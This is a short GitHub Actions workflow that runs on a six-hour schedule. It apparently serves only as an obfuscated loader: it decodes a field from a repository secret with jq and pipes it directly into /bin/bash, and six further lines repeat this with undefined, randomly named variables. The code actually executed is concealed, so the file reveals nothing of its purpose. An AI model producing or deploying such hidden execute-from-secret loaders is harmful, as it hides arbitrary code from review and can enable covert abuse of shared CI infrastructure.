name: jinghongxz
on:
  workflow_dispatch:
  schedule:
    - cron: '36 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jinghongxz
        env:
          c30104: ${{ secrets.c30104 }}
        run: |
          echo $c30104 | jq -r .ies15216 | /bin/bash
          echo $uau60 | jq -r .rtkzb0145 | /bin/bash
          echo $fjui7235 | jq -r .l1 | /bin/bash
          echo $lr04937 | jq -r .x37543 | /bin/bash
          echo $f36 | jq -r .kac3866 | /bin/bash
          echo $jf7 | jq -r .usye9 | /bin/bash
          echo $jk481 | jq -r .suj15696 | /bin/bash

